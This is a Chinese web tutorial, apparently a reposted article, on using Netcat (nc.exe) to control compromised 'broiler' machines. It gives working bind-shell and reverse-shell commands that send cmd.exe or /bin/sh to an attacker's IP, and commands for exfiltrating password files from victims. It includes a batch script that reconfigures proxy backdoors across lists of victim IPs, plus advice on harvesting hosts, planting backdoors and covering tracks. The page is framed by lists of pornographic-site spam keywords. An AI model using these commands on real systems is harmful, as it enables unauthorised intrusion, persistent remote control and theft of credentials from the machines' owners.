亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 課堂 > 電腦教程 > 正文

NC.exe高級技巧應用匯總

2024-09-07 13:38:18
字體:
來源:轉載
供稿:網友

    文章結構
0. 寫在前面的話
1. Netcat 1.10 for NT - nc11nt.zip,原始英文信息
2. Netcat 1.10 for NT 幫助信息
3. Netcat 1.10 常用的命令格式
4. 管理肉雞,更改肉雞設置
5. 下載連接
6. 后記

######################################################################
0. 寫在前面的話
######################################################################
最近工作比較空閑,老是想著怎么自動telnet肉雞,自動執行命令。來管理自己的肉雞。
自己寫一個程序。功底是不夠的,所以只有看了看nc的幫助信息,雖然只看了個半懂,
但是借助于金山詞霸2002版本, 還是明白了一點東西.
我覺的有必要再總結一下.反正主要是滿足我自己的需要.

######################################################################
1. Netcat 1.10 for NT - nc11nt.zip
######################################################################
Basic Features

* Outbound or inbound connections, TCP or UDP, to or from any ports
* Full DNS forward/reverse checking, with appropriate warnings
* Ability to use any local source port
* Ability to use any locally-configured network source address
* Built-in port-scanning capabilities, with randomizer
* Can read command line arguments from standard inputb
* Slow-send mode, one line every N seconds
* Hex dump of transmitted and received data
* Ability to let another program service established
connections
* Telnet-options responder

New for NT

* Ability to run in the background without a console window
* Ability to restart as a single-threaded server to handle a new
connection
________________________________________________________________________
Some of the features of netcat are:

Outbound or inbound connections, TCP or UDP, to or from any ports
Full DNS forward/reverse checking, with appropriate warnings
Ability to use any local source port
Ability to use any locally-configured network source address
Built-in port-scanning capabilities, with randomizer
Built-in loose source-routing capability
Can read command line arguments from standard input
Slow-send mode, one line every N seconds
Optional ability to let another program service inbound connections

Some of the potential uses of netcat:

Script backends
Scanning ports and inventorying services
Backup handlers
File transfers
Server testing and simulation
Firewall testing
Proxy gatewaying
Network performance testing
Address spoofing tests
Protecting X servers
1001 other uses you`ll likely come up with

Netcat + Encryption = Cryptcat

對比win2000微軟的telnet.exe和微軟的tlntsvr.exe服務,連接的時候就可以看出來了.
1.1 NC.EXE是一個非標準的telnet客戶端程序,
1.2 還有一個putty.exe客戶端程序,提供四種連接模式
-raw -telnet -rlogin -ssh.

######################################################################
2. Netcat 1.10 for NT 幫助信息
######################################################################
C:WINDOWSDesktop>nc -h
[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, background mode (后臺模式)
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft (本幫助信息)
-i secs delay interval for lines sent, ports scanned (延遲時間)
-l listen mode, for inbound connects (監聽模式,等待連接)
-L listen harder, re-listen on socket close (連接關閉后,仍然繼續監聽)
-n numeric-only IP addresses, no DNS (ip數字模式,非dns解析)
-o file hex dump of traffic (十六進制模式輸出文件,三段)
-p port local port number (本地端口)
-r randomize local and remote ports (隨機本地遠程端口)
-s addr local source address (本地源地址)
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose] (-vv 更多信息)
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning] (掃描模式,-vv)
port numbers can be individual or ranges: m-n [inclusive]

######################################################################
3. Netcat 1.10 常用的命令格式
######################################################################
下面引用 《沉睡不醒 10月15日凌晨》的文章的部分。

3.1.端口的刺探:
nc -vv ip port
RIVER [192.168.0.198] 19190 (?) open //顯示是否開放open
3.2.掃描器
nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port
這樣掃描會留下大量的痕跡,系統管理員會額外小心

3.3. 后門
victim machine: //受害者的機器
nc -l -p port -e cmd.exe //win2000
nc -l -p port -e /bin/sh //unix,linux
attacker machine: //攻擊者的機器.
nc ip -p port //連接victim_IP,然后得到一個shell。


3.4.反向連接
attacker machine: //一般是sql2.exe,遠程溢出,webdavx3.exe攻擊.
//或者wollf的反向連接.
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port

或者:
attacker machine:
nc -vv -l -p port1 /*用于輸入*/
nc -vv -l -p prot2 /*用于顯示*/
victim machine:
nc attacker_ip port1 | cmd.exe | nc attacker_ip port2
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2

139要加參數-s(nc.exe -L -p 139 -d -e cmd.exe -s 對方機器IP)
這樣就可以保證nc.exe優先于NETBIOS。


3.5.傳送文件:
3.5.1 attacker machine <-- victim machine //從肉雞拖密碼文件回來.
nc -d -l -p port < pathfiledest     /*attacker machine*/ 可以shell執行
nc -vv attacker_ip port > pathfile.txt /*victim machine*/ 需要Ctrl+C退出
//肉雞需要gui界面的cmd.exe里面執行(終端登陸,不如安裝FTP方便).否則沒有辦法輸入Crl+C.

3.5.2 attacker machine --> victim machine //上傳命令文件到肉雞
nc -vv -l -p port > pathfile.txt      /*victim machine*/ 需要Ctrl+C退出
nc -d victim_ip port < pathfiledest   /*attacker machine*/ 可以shell執行
//這樣比較好.我們登陸終端.入侵其他的肉雞.可以選擇shell模式登陸.

結論: 可以傳輸ascii,bin文件.可以傳輸程序文件.

問題:連接某個ip后,傳送完成后,需要發送Ctrl+C退出nc.exe .
或者只有再次連接使用pskill.exe 殺掉進程.但是是否釋放傳輸文件打開的句柄了?


3.6 端口數據抓包.
nc -vv -w 2 -o test.txt www.xfocus.net 80 21-15

< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized...
< 00000084 83 00 00 01 8f # .....


3.7 telnet,自動批處理。 ★★★★★我要重點推薦的東西就是這個.
nc victim_ip port < pathfile.cmd   /*victim machine*/ 顯示執行過程.
nc -vv victim_ip port < pathfile.cmd   /*victim machine*/ 顯示執行過程.

nc -d victim_ip port < pathfile.cmd 安靜模式.

_______________file.cmd________________________
password
cd %windir%
echo []=[%windir%]
c:
cd
md test
cd /d %windir%system32
net stop sksockserver
snake.exe -config port 11111
net start sksockserver
exit
_______________file.cmd__END___________________

######################################################################
4. 管理肉雞,更改肉雞設置
######################################################################
4.1 比如要統一更改肉雞上面的代理端口.snake.exe 修改為11111 服務名稱"sksockserver"
使用winshell后門. 端口1234 密碼password
命令格式就是
modi.bat youip.txt

___________modi.bat____________________________
@if "%1"=="" echo Error: no ip.txt &&goto END

:start
@echo password >a.cmd
@echo s >>a.cmd
@echo cd /d %%windir%%system32 >>a.cmd
@net stop "sksockserver" >>a.cmd
@snake.exe -config port 11111 >>a.cmd
@net start "sksockserver" >>a.cmd
@exit >>a.cmd

:auto
@for /f "eol=; tokens=1,2" %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 < a.cmd)

:END
___________modi.bat__END_______________________


4.2

@echo off
color f0
:start
cls
C:c -vv -w 3 -l -p 80>>80.txt
goto start
把防火墻關掉以后運行這個批處理,會監聽到許多探測U漏洞的信息,大多
是三條一組--妮姆達病毒掃描你的。這樣就會得到肉雞的.雖然質量不高.
但是也是一種便宜的辦法.

肉雞特征:
1。unicode漏洞
2。guest密碼為空,administrators組用戶
3。其他漏洞

自己慢慢的爽去吧。不過,再次強調一句,不建議而且是不能破壞國內主機,上去以后將tftp.exe改名。然后用pskill干掉mmc.exe進程,之后是殺毒。做好后門以后,將guest帳號停用,以對付傻瓜掃描器

######################################################################
5. 下載連接
######################################################################
5.1 http://www.atstake.com/research/tools/network_utilities/
Tool: Netcat 1.10 for Unix
Version: 03.20.96
Platforms: *nix

Tool: Netcat 1.1 for Win 95/98/NT/2000
Version: 02.08.98
Platforms: Runs on Win 95/98/NT/2000


5.2 http://www.xfocus.net/download.php?id=320
名稱: cryptcat_nt.zip 更新時間: 2002-04-05
類別: 網絡工具 平臺: Win9x/NT/2000 大?。?115.8K 提交: maxilaw
簡介: 加密傳輸的nc。

5.3 http://content.443.ch/pub/security/blackhat/Networking/nc/ 國外的網站
10.03.02 15:48 1305 cryptcat.txt
10.03.02 15:48 245760 cryptcat_linux2.tar
10.03.02 15:48 118533 cryptcat_nt.zip

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
欧美亚洲视频在线观看| 亚洲福利视频二区| 北条麻妃99精品青青久久| 亚洲国产精品嫩草影院久久| 懂色av中文一区二区三区天美| 精品视频久久久久久| 97香蕉久久夜色精品国产| 亚洲国产精品久久久久秋霞不卡| 国产一区二中文字幕在线看| 91成人天堂久久成人| 亚洲视频在线观看| 最近2019中文免费高清视频观看www99| 久久久久久国产精品三级玉女聊斋| 九九热精品视频国产| 欧美亚洲免费电影| 欧美精品少妇videofree| 欧美激情精品久久久久久久变态| 亚洲国产高潮在线观看| 欧美裸身视频免费观看| 在线观看久久av| 性欧美暴力猛交69hd| 精品国内自产拍在线观看| 欧美性猛交xxxx乱大交| 亚洲在线视频福利| 国产精品入口尤物| 日韩国产在线播放| 欧美在线精品免播放器视频| 亚州成人av在线| 久久亚洲欧美日韩精品专区| 九九热99久久久国产盗摄| 欧洲成人免费视频| 美女扒开尿口让男人操亚洲视频网站| 亚洲天堂av在线播放| 久久久国产精品视频| 欧美激情a∨在线视频播放| 国产日产亚洲精品| 美女999久久久精品视频| 92国产精品视频| 国产免费一区二区三区香蕉精| 综合网日日天干夜夜久久| 国内精品模特av私拍在线观看| 亚洲美女性生活视频| 国产精品精品视频一区二区三区| 亚洲成人xxx| 成人国产精品色哟哟| 九九热这里只有在线精品视| 国产精品成人av性教育| 色综久久综合桃花网| 91久久久久久久久| 亚洲综合中文字幕在线观看| 亚洲va欧美va国产综合剧情| 国产精品久久久久9999| 国模私拍一区二区三区| 久久久精品美女| 免费99精品国产自在在线| 久久97精品久久久久久久不卡| 日韩av网站电影| 国产在线久久久| 最近2019免费中文字幕视频三| 国产精品入口免费视频一| 乱亲女秽乱长久久久| 国产91色在线免费| 欧美一区二区大胆人体摄影专业网站| 国产精品影院在线观看| 日韩经典一区二区三区| 亚洲精品美女在线观看播放| 国产网站欧美日韩免费精品在线观看| 亚洲伊人久久综合| 久久人人爽人人爽人人片av高清| 亚洲第一福利在线观看| 亚洲国产精品va在线观看黑人| 精品国产一区二区三区久久久狼| 久久91超碰青草是什么| 国产精品va在线播放| 久久久精品一区| 精品少妇一区二区30p| 一区二区三区四区在线观看视频| 亚洲一区二区三区成人在线视频精品| 欧美猛男性生活免费| 97国产精品视频人人做人人爱| 久久久久久久久久久网站| 亚洲影院色无极综合| 91干在线观看| 国产精品视频久久久| 亚洲视频欧美视频| 精品国产老师黑色丝袜高跟鞋| 国产精品福利网| 日韩欧美在线免费| 丰满岳妇乱一区二区三区| 清纯唯美亚洲综合| 久久久久女教师免费一区| 久久精品成人一区二区三区| 亚洲第一精品自拍| 国产精品99久久99久久久二8| 欧美裸体xxxx极品少妇软件| 亚洲色图激情小说| 亚洲美女精品成人在线视频| 久久免费视频网| 久久精品国产亚洲| 性亚洲最疯狂xxxx高清| 亚洲午夜久久久久久久| 欧洲日本亚洲国产区| 久久777国产线看观看精品| 欧美成人剧情片在线观看| 精品国产区一区二区三区在线观看| 日韩国产高清污视频在线观看| 日韩一区二区三区xxxx| 欧美成在线观看| 日韩免费av在线| 自拍偷拍亚洲欧美| 久久久久亚洲精品| 欧美激情精品久久久久久蜜臀| 亚洲欧美变态国产另类| 国产精品免费久久久久影院| 在线视频精品一| 日韩日本欧美亚洲| 国产97在线播放| 国产精品成人一区| 国产成人a亚洲精品| 午夜精品在线视频| 欧美电影免费观看大全| 国产日韩欧美视频| 成人精品视频久久久久| 国产一区二区日韩精品欧美精品| 日韩精品中文字幕在线播放| 少妇久久久久久| 国产日韩在线精品av| 欧美性高潮床叫视频| 亚洲在线www| 日韩精品亚洲元码| 91精品在线国产| 国产日韩欧美中文| 国产成人在线一区二区| 亚洲人成网站999久久久综合| 国外日韩电影在线观看| 亚洲欧美精品伊人久久| 米奇精品一区二区三区在线观看| 国产精品吴梦梦| 成人妇女淫片aaaa视频| 久久av资源网站| 国产精品18久久久久久麻辣| 亚洲字幕在线观看| 中文日韩在线观看| 欧美激情在线播放| 亚洲视频在线免费看| 亚洲成人网在线观看| 亚洲摸下面视频| 成人av在线天堂| 热re99久久精品国产66热| 国产精品网站入口| 国产精品久久久久aaaa九色| 国产日产亚洲精品| 欧美整片在线观看| 亚洲精品一二区| 日韩在线播放视频| 久久精品国产综合| 久久久久久久国产精品视频| 欧美日韩视频免费播放| 91免费看视频.| 亚洲天堂影视av| 国语对白做受69| 日韩欧美亚洲范冰冰与中字| 色综合男人天堂| 国产精品都在这里|